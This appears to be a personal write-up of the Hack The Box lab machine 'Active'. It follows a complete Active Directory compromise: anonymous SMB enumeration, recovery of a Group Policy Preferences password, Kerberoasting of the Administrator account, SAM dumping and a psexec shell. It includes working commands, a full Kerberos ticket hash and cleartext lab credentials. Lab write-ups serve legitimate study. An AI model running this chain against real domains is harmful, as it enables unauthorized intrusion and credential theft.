Active AD machine HTB
Start
Scanning with nmap
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-11-24 03:13:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-11-24T03:14:39
Enumerate
netexec smb $target
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)
netexec smb $target -u '' -p '' --users
netexec smb $target -u '' -p '' --rid-brute
netexec smb $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u 'guest' -p '' --users
netexec ldap $target -u 'guest' -p '' --rid-brute
netexec ldap $target -u '' -p '' --users
Add the domain to /etc/hosts (active.htb -> $target) before the rpcclient and ldap steps
rpcclient -U "" -N $target
enumdomusers
netexec smb $target -u '' -p '' --shares
smbclient -N -L //$target
netexec smb $target -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.10.100 445 DC [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.10.10.100 445 DC [+] active.htb\:
SPIDER_PLUS 10.10.10.100 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.100 445 DC [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.10.100 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.100 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.100 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.10.100 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.100 445 DC [*] OUTPUT_FOLDER: /home/lika/.nxc/modules/nxc_spider_plus
SMB 10.10.10.100 445 DC [*] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users
SPIDER_PLUS 10.10.10.100 445 DC [+] Saved share-file metadata to "/home/lika/.nxc/modules/nxc_spider_plus/10.10.10.100.json".
SPIDER_PLUS 10.10.10.100 445 DC [*] SMB Shares: 7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.10.10.100 445 DC [*] SMB Readable Shares: 1 (Replication)
SPIDER_PLUS 10.10.10.100 445 DC [*] Total folders found: 22
SPIDER_PLUS 10.10.10.100 445 DC [*] Total files found: 7
SPIDER_PLUS 10.10.10.100 445 DC [*] File size average: 1.16 KB
SPIDER_PLUS 10.10.10.100 445 DC [*] File size min: 22 B
SPIDER_PLUS 10.10.10.100 445 DC [*] File size max: 3.63 KB
SPIDER_PLUS 10.10.10.100 445 DC [*] File unique exts: 4 (inf, xml, pol, ini)
SPIDER_PLUS 10.10.10.100 445 DC [*] Downloads successful: 7
SPIDER_PLUS 10.10.10.100 445 DC [+] All files processed successfully.
Look at the file list in "/home/lika/.nxc/modules/nxc_spider_plus/10.10.10.100.json", then grep the downloaded files: grep -ri 'pass' /home/lika/.nxc/modules/nxc_spider_plus/10.10.10.100/
Replication is a readable copy of SYSVOL, so the usual find is a Group Policy Preferences cpassword in an XML file; the AES key for it is public (MS14-025) and gpp-decrypt recovers the plaintext. That is where the SVC_TGS credential below comes from.
impacket-GetUserSPNs -dc-ip $target 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -request
If this fails with a clock skew error (KRB_AP_ERR_SKEW), shift the local clock to the DC's time. The nmap output shows the DC time (server time: 2025-11-24 03:13:43Z); Kerberos rejects requests when the skew exceeds 5 minutes by default.
sudo timedatectl set-ntp false
sudo date -s "7 hours 31 minutes"
Only after syncing the clock to the DC did GetUserSPNs return the hash:
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$62052e4bf360589965e07dce490489e0$92611f7e9dcb3bb29f5102625f236e8543aeeb3c4250d589b3ffd757963d377007a3a1afe19483137daa2ee3d1001d21d19281d96ddbabed333d6ef2e7cf1002e4362827053e5942c0a55659f5bb43f39e384ede336fe2440e6117169506a996c75befe091b5696d02102fae3e9f9a02d9dd72bf019b291b66c15728a056ec3727d4a5c5938b53e4f1a98ca879692a4564e07badd3eef34e3b73999f623112005d9642bd58e1ca8c3a74daadf43ad804cca25eaf980eedcb738f7ebf66c4bca7c0be29245f4c8481f81c98344f5551ecfa50ccf46a69b1af6b2b6f0263c8c84faf3fbf16bfcf86043480fceadaf3027b00acd5b109a0769752a469e5242733fe9554754c55dfec7e7d4d4b3a68a53ead7b4d5333df43d13a874138b56d48e5ded8bd16a3a16e037119a4d6800d6c0d946053cdaf28114d707797ab4bf0fe6aae5a3b35396c06959484a0b3b4a8dd4924cb40b2b894692e20a097e2d283df38f97c46b5585c7dd9593c9ecf48f47e33568c3167cf4b7a47bda3087acbef8e2f8bfc645dbaad66aa411c92ca80ad0570798a5372b0ff4416cf587baf164c1a6b547fca16e073a796e17fb78d9915b0013a65f5f6a7f64fdc30c770b383366bec5bd8a8d7c8e107ab19316d44053f4b49c1fe806549263b52ebce1a8a8e4a3dd0260425abcc2a11a127ab1ffd54b0f12103b84980ec129b77fd8850198e7c5e8a2202e50bd6c2bcfd847432e2e06814076953aea560efffabe3783600bfd0b93d335dae41eae6ce3a235cef4f5b41eae8ca8cfaf657c11a3630977156afc8173efb424fc0ba4d31ae7997d23936da65dd461a8756455e797be3122b9515f05289ef55cd6561c0d7e4c5a0367f17fe7e023fec4415280ce86a28cd06efbff99aef71d03cb52224349ae1c720d841622644543204f318c9adec8a2473313914dcb66a2a212bd14a1d11743b09515ae5b8ee4710dff93ec102b970f6645c4c093c5173551bd8f0f760c5a807ae66011da40fbe523634736906d5704d1c44ece270992fafcddf4cc12cb1b93262adfbef43b3ee81e9915483221c06705485a5989604133c20d2e85ce9f1d8be2b2c216edbf788ca601108f26c40ef7b0c17a05565864d95b6203641949f926f365197da88fff7a95aac83c7b41c48020a7efb032ae23279078e39cef4a65eab20e3b996ad9b21ae68fbf88cab7bd58b02e3d798f51facecd5b04b1db424e9340d97724a0c3c92c6073c3b10f2980472ac
netexec smb $target -u 'Administrator' -p 'Ticketmaster1968'
netexec smb $target -u 'Administrator' -p 'Ticketmaster1968' --sam
rlwrap impacket-psexec active.htb/Administrator:Ticketmaster1968@$target
Kill all background jobs
for j in $(jobs | awk '{print $1}' | tr -d '[]'); do kill %$j; done